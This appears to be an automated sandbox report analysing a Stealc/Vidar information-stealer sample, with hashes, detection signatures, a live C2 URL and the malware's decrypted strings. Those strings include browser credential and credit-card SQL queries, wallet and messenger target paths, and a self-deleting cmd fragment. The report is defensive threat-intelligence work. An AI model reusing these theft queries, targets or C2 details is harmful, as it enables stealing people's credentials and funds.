Windows Analysis Report
i3NmF0obCm.exe

Overview

General Information

Sample name: i3NmF0obCm.exe
renamed because original name is a hash value
Original sample name: 253ccac8a47b80287f651987c0c779ea.exe
Analysis ID: 1465851
MD5: 253ccac8a47b80287f651987c0c779ea
SHA1: 11db405849dbaa9b3759de921835df20fab35bc3
SHA256: 262a400b339deea5089433709ce559d23253e23d23c07595b515755114147e2f
Tags: 32, exe, trojan

Detection

Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
PE file has a writeable .text section
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that grabs information on 2FA software and the Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: i3NmF0obCm.exe Avira: detected
Source: i3NmF0obCm.exe Malware Configuration Extractor: Vidar {"C2 url": "http://40.86.87.10/108e010e8f91c38c.php"}
Source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://40.86.87.10/108e010e8f91c38c.php"}
Source: i3NmF0obCm.exe Virustotal: Detection: 58%
Source: i3NmF0obCm.exe ReversingLabs: Detection: 71%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: i3NmF0obCm.exe String decryptor: INSERT_KEY_HERE
Source: i3NmF0obCm.exe String decryptor: GetProcAddress
Source: i3NmF0obCm.exe String decryptor: LoadLibraryA
Source: i3NmF0obCm.exe String decryptor: lstrcatA
Source: i3NmF0obCm.exe String decryptor: OpenEventA
Source: i3NmF0obCm.exe String decryptor: CreateEventA
Source: i3NmF0obCm.exe String decryptor: CloseHandle
Source: i3NmF0obCm.exe String decryptor: Sleep
Source: i3NmF0obCm.exe String decryptor: GetUserDefaultLangID
Source: i3NmF0obCm.exe String decryptor: VirtualAllocExNuma
Source: i3NmF0obCm.exe String decryptor: VirtualFree
Source: i3NmF0obCm.exe String decryptor: GetSystemInfo
Source: i3NmF0obCm.exe String decryptor: VirtualAlloc
Source: i3NmF0obCm.exe String decryptor: HeapAlloc
Source: i3NmF0obCm.exe String decryptor: GetComputerNameA
Source: i3NmF0obCm.exe String decryptor: lstrcpyA
Source: i3NmF0obCm.exe String decryptor: GetProcessHeap
Source: i3NmF0obCm.exe String decryptor: GetCurrentProcess
Source: i3NmF0obCm.exe String decryptor: lstrlenA
Source: i3NmF0obCm.exe String decryptor: ExitProcess
Source: i3NmF0obCm.exe String decryptor: GlobalMemoryStatusEx
Source: i3NmF0obCm.exe String decryptor: GetSystemTime
Source: i3NmF0obCm.exe String decryptor: SystemTimeToFileTime
Source: i3NmF0obCm.exe String decryptor: advapi32.dll
Source: i3NmF0obCm.exe String decryptor: gdi32.dll
Source: i3NmF0obCm.exe String decryptor: user32.dll
Source: i3NmF0obCm.exe String decryptor: crypt32.dll
Source: i3NmF0obCm.exe String decryptor: ntdll.dll
Source: i3NmF0obCm.exe String decryptor: GetUserNameA
Source: i3NmF0obCm.exe String decryptor: CreateDCA
Source: i3NmF0obCm.exe String decryptor: GetDeviceCaps
Source: i3NmF0obCm.exe String decryptor: ReleaseDC
Source: i3NmF0obCm.exe String decryptor: CryptStringToBinaryA
Source: i3NmF0obCm.exe String decryptor: sscanf
Source: i3NmF0obCm.exe String decryptor: VMwareVMware
Source: i3NmF0obCm.exe String decryptor: HAL9TH
Source: i3NmF0obCm.exe String decryptor: JohnDoe
Source: i3NmF0obCm.exe String decryptor: DISPLAY
Source: i3NmF0obCm.exe String decryptor: %hu/%hu/%hu
Source: i3NmF0obCm.exe String decryptor: http://40.86.87.10
Source: i3NmF0obCm.exe String decryptor: /108e010e8f91c38c.php
Source: i3NmF0obCm.exe String decryptor: /b13597c85f807692/
Source: i3NmF0obCm.exe String decryptor: GetEnvironmentVariableA
Source: i3NmF0obCm.exe String decryptor: GetFileAttributesA
Source: i3NmF0obCm.exe String decryptor: GlobalLock
Source: i3NmF0obCm.exe String decryptor: HeapFree
Source: i3NmF0obCm.exe String decryptor: GetFileSize
Source: i3NmF0obCm.exe String decryptor: GlobalSize
Source: i3NmF0obCm.exe String decryptor: CreateToolhelp32Snapshot
Source: i3NmF0obCm.exe String decryptor: IsWow64Process
Source: i3NmF0obCm.exe String decryptor: Process32Next
Source: i3NmF0obCm.exe String decryptor: GetLocalTime
Source: i3NmF0obCm.exe String decryptor: FreeLibrary
Source: i3NmF0obCm.exe String decryptor: GetTimeZoneInformation
Source: i3NmF0obCm.exe String decryptor: GetSystemPowerStatus
Source: i3NmF0obCm.exe String decryptor: GetVolumeInformationA
Source: i3NmF0obCm.exe String decryptor: GetWindowsDirectoryA
Source: i3NmF0obCm.exe String decryptor: Process32First
Source: i3NmF0obCm.exe String decryptor: GetLocaleInfoA
Source: i3NmF0obCm.exe String decryptor: GetUserDefaultLocaleName
Source: i3NmF0obCm.exe String decryptor: GetModuleFileNameA
Source: i3NmF0obCm.exe String decryptor: DeleteFileA
Source: i3NmF0obCm.exe String decryptor: FindNextFileA
Source: i3NmF0obCm.exe String decryptor: LocalFree
Source: i3NmF0obCm.exe String decryptor: FindClose
Source: i3NmF0obCm.exe String decryptor: SetEnvironmentVariableA
Source: i3NmF0obCm.exe String decryptor: LocalAlloc
Source: i3NmF0obCm.exe String decryptor: GetFileSizeEx
Source: i3NmF0obCm.exe String decryptor: ReadFile
Source: i3NmF0obCm.exe String decryptor: SetFilePointer
Source: i3NmF0obCm.exe String decryptor: WriteFile
Source: i3NmF0obCm.exe String decryptor: CreateFileA
Source: i3NmF0obCm.exe String decryptor: FindFirstFileA
Source: i3NmF0obCm.exe String decryptor: CopyFileA
Source: i3NmF0obCm.exe String decryptor: VirtualProtect
Source: i3NmF0obCm.exe String decryptor: GetLogicalProcessorInformationEx
Source: i3NmF0obCm.exe String decryptor: GetLastError
Source: i3NmF0obCm.exe String decryptor: lstrcpynA
Source: i3NmF0obCm.exe String decryptor: MultiByteToWideChar
Source: i3NmF0obCm.exe String decryptor: GlobalFree
Source: i3NmF0obCm.exe String decryptor: WideCharToMultiByte
Source: i3NmF0obCm.exe String decryptor: GlobalAlloc
Source: i3NmF0obCm.exe String decryptor: OpenProcess
Source: i3NmF0obCm.exe String decryptor: TerminateProcess
Source: i3NmF0obCm.exe String decryptor: GetCurrentProcessId
Source: i3NmF0obCm.exe String decryptor: gdiplus.dll
Source: i3NmF0obCm.exe String decryptor: ole32.dll
Source: i3NmF0obCm.exe String decryptor: bcrypt.dll
Source: i3NmF0obCm.exe String decryptor: wininet.dll
Source: i3NmF0obCm.exe String decryptor: shlwapi.dll
Source: i3NmF0obCm.exe String decryptor: shell32.dll
Source: i3NmF0obCm.exe String decryptor: psapi.dll
Source: i3NmF0obCm.exe String decryptor: rstrtmgr.dll
Source: i3NmF0obCm.exe String decryptor: CreateCompatibleBitmap
Source: i3NmF0obCm.exe String decryptor: SelectObject
Source: i3NmF0obCm.exe String decryptor: BitBlt
Source: i3NmF0obCm.exe String decryptor: DeleteObject
Source: i3NmF0obCm.exe String decryptor: CreateCompatibleDC
Source: i3NmF0obCm.exe String decryptor: GdipGetImageEncodersSize
Source: i3NmF0obCm.exe String decryptor: GdipGetImageEncoders
Source: i3NmF0obCm.exe String decryptor: GdipCreateBitmapFromHBITMAP
Source: i3NmF0obCm.exe String decryptor: GdiplusStartup
Source: i3NmF0obCm.exe String decryptor: GdiplusShutdown
Source: i3NmF0obCm.exe String decryptor: GdipSaveImageToStream
Source: i3NmF0obCm.exe String decryptor: GdipDisposeImage
Source: i3NmF0obCm.exe String decryptor: GdipFree
Source: i3NmF0obCm.exe String decryptor: GetHGlobalFromStream
Source: i3NmF0obCm.exe String decryptor: CreateStreamOnHGlobal
Source: i3NmF0obCm.exe String decryptor: CoUninitialize
Source: i3NmF0obCm.exe String decryptor: CoInitialize
Source: i3NmF0obCm.exe String decryptor: CoCreateInstance
Source: i3NmF0obCm.exe String decryptor: BCryptGenerateSymmetricKey
Source: i3NmF0obCm.exe String decryptor: BCryptCloseAlgorithmProvider
Source: i3NmF0obCm.exe String decryptor: BCryptDecrypt
Source: i3NmF0obCm.exe String decryptor: BCryptSetProperty
Source: i3NmF0obCm.exe String decryptor: BCryptDestroyKey
Source: i3NmF0obCm.exe String decryptor: BCryptOpenAlgorithmProvider
Source: i3NmF0obCm.exe String decryptor: GetWindowRect
Source: i3NmF0obCm.exe String decryptor: GetDesktopWindow
Source: i3NmF0obCm.exe String decryptor: GetDC
Source: i3NmF0obCm.exe String decryptor: CloseWindow
Source: i3NmF0obCm.exe String decryptor: wsprintfA
Source: i3NmF0obCm.exe String decryptor: EnumDisplayDevicesA
Source: i3NmF0obCm.exe String decryptor: GetKeyboardLayoutList
Source: i3NmF0obCm.exe String decryptor: CharToOemW
Source: i3NmF0obCm.exe String decryptor: wsprintfW
Source: i3NmF0obCm.exe String decryptor: RegQueryValueExA
Source: i3NmF0obCm.exe String decryptor: RegEnumKeyExA
Source: i3NmF0obCm.exe String decryptor: RegOpenKeyExA
Source: i3NmF0obCm.exe String decryptor: RegCloseKey
Source: i3NmF0obCm.exe String decryptor: RegEnumValueA
Source: i3NmF0obCm.exe String decryptor: CryptBinaryToStringA
Source: i3NmF0obCm.exe String decryptor: CryptUnprotectData
Source: i3NmF0obCm.exe String decryptor: SHGetFolderPathA
Source: i3NmF0obCm.exe String decryptor: ShellExecuteExA
Source: i3NmF0obCm.exe String decryptor: InternetOpenUrlA
Source: i3NmF0obCm.exe String decryptor: InternetConnectA
Source: i3NmF0obCm.exe String decryptor: InternetCloseHandle
Source: i3NmF0obCm.exe String decryptor: InternetOpenA
Source: i3NmF0obCm.exe String decryptor: HttpSendRequestA
Source: i3NmF0obCm.exe String decryptor: HttpOpenRequestA
Source: i3NmF0obCm.exe String decryptor: InternetReadFile
Source: i3NmF0obCm.exe String decryptor: InternetCrackUrlA
Source: i3NmF0obCm.exe String decryptor: StrCmpCA
Source: i3NmF0obCm.exe String decryptor: StrStrA
Source: i3NmF0obCm.exe String decryptor: StrCmpCW
Source: i3NmF0obCm.exe String decryptor: PathMatchSpecA
Source: i3NmF0obCm.exe String decryptor: GetModuleFileNameExA
Source: i3NmF0obCm.exe String decryptor: RmStartSession
Source: i3NmF0obCm.exe String decryptor: RmRegisterResources
Source: i3NmF0obCm.exe String decryptor: RmGetList
Source: i3NmF0obCm.exe String decryptor: RmEndSession
Source: i3NmF0obCm.exe String decryptor: sqlite3_open
Source: i3NmF0obCm.exe String decryptor: sqlite3_prepare_v2
Source: i3NmF0obCm.exe String decryptor: sqlite3_step
Source: i3NmF0obCm.exe String decryptor: sqlite3_column_text
Source: i3NmF0obCm.exe String decryptor: sqlite3_finalize
Source: i3NmF0obCm.exe String decryptor: sqlite3_close
Source: i3NmF0obCm.exe String decryptor: sqlite3_column_bytes
Source: i3NmF0obCm.exe String decryptor: sqlite3_column_blob
Source: i3NmF0obCm.exe String decryptor: encrypted_key
Source: i3NmF0obCm.exe String decryptor: PATH
Source: i3NmF0obCm.exe String decryptor: C:\ProgramData\nss3.dll
Source: i3NmF0obCm.exe String decryptor: NSS_Init
Source: i3NmF0obCm.exe String decryptor: NSS_Shutdown
Source: i3NmF0obCm.exe String decryptor: PK11_GetInternalKeySlot
Source: i3NmF0obCm.exe String decryptor: PK11_FreeSlot
Source: i3NmF0obCm.exe String decryptor: PK11_Authenticate
Source: i3NmF0obCm.exe String decryptor: PK11SDR_Decrypt
Source: i3NmF0obCm.exe String decryptor: C:\ProgramData\
Source: i3NmF0obCm.exe String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: i3NmF0obCm.exe String decryptor: browser:
Source: i3NmF0obCm.exe String decryptor: profile:
Source: i3NmF0obCm.exe String decryptor: url:
Source: i3NmF0obCm.exe String decryptor: login:
Source: i3NmF0obCm.exe String decryptor: password:
Source: i3NmF0obCm.exe String decryptor: Opera
Source: i3NmF0obCm.exe String decryptor: OperaGX
Source: i3NmF0obCm.exe String decryptor: Network
Source: i3NmF0obCm.exe String decryptor: cookies
Source: i3NmF0obCm.exe String decryptor: .txt
Source: i3NmF0obCm.exe String decryptor: TRUE
Source: i3NmF0obCm.exe String decryptor: FALSE
Source: i3NmF0obCm.exe String decryptor: autofill
Source: i3NmF0obCm.exe String decryptor: SELECT name, value FROM autofill
Source: i3NmF0obCm.exe String decryptor: history
Source: i3NmF0obCm.exe String decryptor: SELECT url FROM urls LIMIT 1000
Source: i3NmF0obCm.exe String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: i3NmF0obCm.exe String decryptor: name:
Source: i3NmF0obCm.exe String decryptor: month:
Source: i3NmF0obCm.exe String decryptor: year:
Source: i3NmF0obCm.exe String decryptor: card:
Source: i3NmF0obCm.exe String decryptor: Cookies
Source: i3NmF0obCm.exe String decryptor: Login Data
Source: i3NmF0obCm.exe String decryptor: Web Data
Source: i3NmF0obCm.exe String decryptor: History
Source: i3NmF0obCm.exe String decryptor: logins.json
Source: i3NmF0obCm.exe String decryptor: formSubmitURL
Source: i3NmF0obCm.exe String decryptor: usernameField
Source: i3NmF0obCm.exe String decryptor: encryptedUsername
Source: i3NmF0obCm.exe String decryptor: encryptedPassword
Source: i3NmF0obCm.exe String decryptor: guid
Source: i3NmF0obCm.exe String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: i3NmF0obCm.exe String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: i3NmF0obCm.exe String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: i3NmF0obCm.exe String decryptor: cookies.sqlite
Source: i3NmF0obCm.exe String decryptor: formhistory.sqlite
Source: i3NmF0obCm.exe String decryptor: places.sqlite
Source: i3NmF0obCm.exe String decryptor: plugins
Source: i3NmF0obCm.exe String decryptor: Local Extension Settings
Source: i3NmF0obCm.exe String decryptor: Sync Extension Settings
Source: i3NmF0obCm.exe String decryptor: IndexedDB
Source: i3NmF0obCm.exe String decryptor: Opera Stable
Source: i3NmF0obCm.exe String decryptor: Opera GX Stable
Source: i3NmF0obCm.exe String decryptor: CURRENT
Source: i3NmF0obCm.exe String decryptor: chrome-extension_
Source: i3NmF0obCm.exe String decryptor: _0.indexeddb.leveldb
Source: i3NmF0obCm.exe String decryptor: Local State
Source: i3NmF0obCm.exe String decryptor: profiles.ini
Source: i3NmF0obCm.exe String decryptor: chrome
Source: i3NmF0obCm.exe String decryptor: opera
Source: i3NmF0obCm.exe String decryptor: firefox
Source: i3NmF0obCm.exe String decryptor: wallets
Source: i3NmF0obCm.exe String decryptor: %08lX%04lX%lu
Source: i3NmF0obCm.exe String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: i3NmF0obCm.exe String decryptor: ProductName
Source: i3NmF0obCm.exe String decryptor: %d/%d/%d %d:%d:%d
Source: i3NmF0obCm.exe String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: i3NmF0obCm.exe String decryptor: ProcessorNameString
Source: i3NmF0obCm.exe String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: i3NmF0obCm.exe String decryptor: DisplayName
Source: i3NmF0obCm.exe String decryptor: DisplayVersion
Source: i3NmF0obCm.exe String decryptor: Network Info:
Source: i3NmF0obCm.exe String decryptor: - IP: IP?
Source: i3NmF0obCm.exe String decryptor: - Country: ISO?
Source: i3NmF0obCm.exe String decryptor: System Summary:
Source: i3NmF0obCm.exe String decryptor: - HWID:
Source: i3NmF0obCm.exe String decryptor: - OS:
Source: i3NmF0obCm.exe String decryptor: - Architecture:
Source: i3NmF0obCm.exe String decryptor: - UserName:
Source: i3NmF0obCm.exe String decryptor: - Computer Name:
Source: i3NmF0obCm.exe String decryptor: - Local Time:
Source: i3NmF0obCm.exe String decryptor: - UTC:
Source: i3NmF0obCm.exe String decryptor: - Language:
Source: i3NmF0obCm.exe String decryptor: - Keyboards:
Source: i3NmF0obCm.exe String decryptor: - Laptop:
Source: i3NmF0obCm.exe String decryptor: - Running Path:
Source: i3NmF0obCm.exe String decryptor: - CPU:
Source: i3NmF0obCm.exe String decryptor: - Threads:
Source: i3NmF0obCm.exe String decryptor: - Cores:
Source: i3NmF0obCm.exe String decryptor: - RAM:
Source: i3NmF0obCm.exe String decryptor: - Display Resolution:
Source: i3NmF0obCm.exe String decryptor: - GPU:
Source: i3NmF0obCm.exe String decryptor: User Agents:
Source: i3NmF0obCm.exe String decryptor: Installed Apps:
Source: i3NmF0obCm.exe String decryptor: All Users:
Source: i3NmF0obCm.exe String decryptor: Current User:
Source: i3NmF0obCm.exe String decryptor: Process List:
Source: i3NmF0obCm.exe String decryptor: system_info.txt
Source: i3NmF0obCm.exe String decryptor: freebl3.dll
Source: i3NmF0obCm.exe String decryptor: mozglue.dll
Source: i3NmF0obCm.exe String decryptor: msvcp140.dll
Source: i3NmF0obCm.exe String decryptor: nss3.dll
Source: i3NmF0obCm.exe String decryptor: softokn3.dll
Source: i3NmF0obCm.exe String decryptor: vcruntime140.dll
Source: i3NmF0obCm.exe String decryptor: \Temp\
Source: i3NmF0obCm.exe String decryptor: .exe
Source: i3NmF0obCm.exe String decryptor: runas
Source: i3NmF0obCm.exe String decryptor: open
Source: i3NmF0obCm.exe String decryptor: /c start
Source: i3NmF0obCm.exe String decryptor: %DESKTOP%
Source: i3NmF0obCm.exe String decryptor: %APPDATA%
Source: i3NmF0obCm.exe String decryptor: %LOCALAPPDATA%
Source: i3NmF0obCm.exe String decryptor: %USERPROFILE%
Source: i3NmF0obCm.exe String decryptor: %DOCUMENTS%
Source: i3NmF0obCm.exe String decryptor: %PROGRAMFILES%
Source: i3NmF0obCm.exe String decryptor: %PROGRAMFILES_86%
Source: i3NmF0obCm.exe String decryptor: %RECENT%
Source: i3NmF0obCm.exe String decryptor: *.lnk
Source: i3NmF0obCm.exe String decryptor: files
Source: i3NmF0obCm.exe String decryptor: \discord\
Source: i3NmF0obCm.exe String decryptor: \Local Storage\leveldb\CURRENT
Source: i3NmF0obCm.exe String decryptor: \Local Storage\leveldb
Source: i3NmF0obCm.exe String decryptor: \Telegram Desktop\
Source: i3NmF0obCm.exe String decryptor: key_datas
Source: i3NmF0obCm.exe String decryptor: D877F783D5D3EF8C*
Source: i3NmF0obCm.exe String decryptor: map*
Source: i3NmF0obCm.exe String decryptor: A7FDF864FBC10B77*
Source: i3NmF0obCm.exe String decryptor: A92DAA6EA6F891F2*
Source: i3NmF0obCm.exe String decryptor: F8806DD0C461824F*
Source: i3NmF0obCm.exe String decryptor: Telegram
Source: i3NmF0obCm.exe String decryptor: *.tox
Source: i3NmF0obCm.exe String decryptor: *.ini
Source: i3NmF0obCm.exe String decryptor: Password
Source: i3NmF0obCm.exe String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe String decryptor: 00000001
Source: i3NmF0obCm.exe String decryptor: 00000002
Source: i3NmF0obCm.exe String decryptor: 00000003
Source: i3NmF0obCm.exe String decryptor: 00000004
Source: i3NmF0obCm.exe String decryptor: \Outlook\accounts.txt
Source: i3NmF0obCm.exe String decryptor: Pidgin
Source: i3NmF0obCm.exe String decryptor: \.purple\
Source: i3NmF0obCm.exe String decryptor: accounts.xml
Source: i3NmF0obCm.exe String decryptor: dQw4w9WgXcQ
Source: i3NmF0obCm.exe String decryptor: token:
Source: i3NmF0obCm.exe String decryptor: Software\Valve\Steam
Source: i3NmF0obCm.exe String decryptor: SteamPath
Source: i3NmF0obCm.exe String decryptor: \config\
Source: i3NmF0obCm.exe String decryptor: ssfn*
Source: i3NmF0obCm.exe String decryptor: config.vdf
Source: i3NmF0obCm.exe String decryptor: DialogConfig.vdf
Source: i3NmF0obCm.exe String decryptor: DialogConfigOverlay*.vdf
Source: i3NmF0obCm.exe String decryptor: libraryfolders.vdf
Source: i3NmF0obCm.exe String decryptor: loginusers.vdf
Source: i3NmF0obCm.exe String decryptor: \Steam\
Source: i3NmF0obCm.exe String decryptor: sqlite3.dll
Source: i3NmF0obCm.exe String decryptor: browsers
Source: i3NmF0obCm.exe String decryptor: done
Source: i3NmF0obCm.exe String decryptor: soft
Source: i3NmF0obCm.exe String decryptor: \Discord\tokens.txt
Source: i3NmF0obCm.exe String decryptor: /c timeout /t 5 & del /f /q "
Source: i3NmF0obCm.exe String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: i3NmF0obCm.exe String decryptor: C:\Windows\system32\cmd.exe
Source: i3NmF0obCm.exe String decryptor: https
Source: i3NmF0obCm.exe String decryptor: Content-Type: multipart/form-data; boundary=----
Source: i3NmF0obCm.exe String decryptor: POST
Source: i3NmF0obCm.exe String decryptor: HTTP/1.1
Source: i3NmF0obCm.exe String decryptor: Content-Disposition: form-data; name="
Source: i3NmF0obCm.exe String decryptor: hwid
Source: i3NmF0obCm.exe String decryptor: build
Source: i3NmF0obCm.exe String decryptor: token
Source: i3NmF0obCm.exe String decryptor: file_name
Source: i3NmF0obCm.exe String decryptor: file
Source: i3NmF0obCm.exe String decryptor: message
Source: i3NmF0obCm.exe String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: i3NmF0obCm.exe String decryptor: screenshot.jpg
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EE9560 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00EE9560
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EE94C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00EE94C0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EE6C40 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00EE6C40
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF6DB0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 0_2_00EF6DB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EEBFC0 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_00EEBFC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C4E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C4E6C80
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C63A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6C63A9A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C634440 PK11_PrivDecrypt, 0_2_6C634440
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C604420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6C604420
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_6C6344C0 PK11_PubEncrypt, 0_2_6C6344C0
Source: i3NmF0obCm.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: i3NmF0obCm.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EEEDE0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00EEEDE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EED1F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00EED1F0
